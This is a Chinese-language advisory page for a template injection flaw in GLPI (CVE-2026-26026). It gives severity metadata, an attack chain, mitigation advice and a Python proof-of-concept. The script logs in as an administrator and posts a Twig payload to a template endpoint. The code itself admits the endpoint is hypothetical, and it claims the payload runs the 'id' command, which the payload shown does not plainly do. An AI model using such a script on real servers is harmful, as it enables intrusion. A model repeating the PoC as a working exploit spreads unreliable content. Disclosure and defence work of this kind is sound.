CVE-2026-26026 CVSS 9.1 严重

CVE-2026-26026 GLPI模板注入致远程代码执行漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-26026

漏洞类型

模板注入

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

GLPI

漏洞概述

GLPI是一款开源的IT资产及管理软件包。在其11.0.0至11.0.6之前的版本中，系统未能正确过滤管理员提交的模板内容，导致存在模板注入漏洞。拥有管理员权限的攻击者可以利用该漏洞在服务器端执行任意代码，从而完全控制系统。该漏洞危害极高，建议立即升级修复。

技术细节

该漏洞属于服务端模板注入（SSTI）。GLPI在处理模板数据时，对用户输入缺乏严格的校验，允许将用户可控的数据传递给模板引擎解析。攻击者需具备管理员权限（PR:H），通过向模板字段注入特定语法（如Twig语法），欺骗服务器端引擎执行恶意逻辑。由于攻击复杂度低（AC:L）且无需用户交互（UI:N），一旦攻击者获得后台权限，即可轻易利用此漏洞。利用该漏洞可直接执行系统命令（RCE），导致机密性、完整性及可用性全面受损（C:H/I:H/A:H）。攻击者可借此读取敏感文件、部署Webshell或进一步内网渗透。

攻击链分析

STEP 1

获取访问权限

攻击者通过钓鱼、暴力破解或利用其他漏洞获取GLPI管理员账户凭证。

STEP 2

构造恶意载荷

攻击者构造包含恶意模板语法（如Twig代码）的载荷，旨在触发系统命令执行。

STEP 3

注入模板

攻击者登录管理后台，找到模板编辑或导入功能，将恶意载荷注入到模板内容中。

STEP 4

触发执行

当系统渲染或预览该模板时，模板引擎解析恶意代码，导致服务器执行任意系统命令（RCE）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-26026 (GLPI Template Injection)
# Target: GLPI < 11.0.6
# Note: Requires Administrator privileges.

target_url = "http://glpi-server.com"
login_url = f"{target_url}/login.php"

# 1. Authenticate as Admin
session = requests.Session()
creds = {
    "login": "admin",
    "password": "admin_password",
    "auth": "local"
}
session.post(login_url, data=creds)

# 2. Prepare Payload (Twig SSTI)
# Payload to execute 'id' command
payload = "{{_self.env.display(\"id\")}}"

# 3. Send Payload to Template Endpoint
# Endpoint is hypothetical, adjust based on actual vulnerable path
exploit_url = f"{target_url}/ajax/template.php"
data = {
    "content": payload,
    "id": "1"
}

response = session.post(exploit_url, data=data)

# 4. Check Result
if response.status_code == 200:
    print("[+] Exploit sent successfully!")
    print(f"[+] Response: {response.text}")
else:
    print("[-] Exploit failed")

影响范围

GLPI >= 11.0.0, < 11.0.6

防御指南

临时缓解措施

在未升级前，建议严格限制管理员账户的访问权限，仅允许受信任的IP访问管理后台。同时，部署Web应用防火墙（WAF）以检测和拦截常见的模板注入特征（如{{, {%等字符）。加强对系统日志的审计，监控是否存在异常的模板修改行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表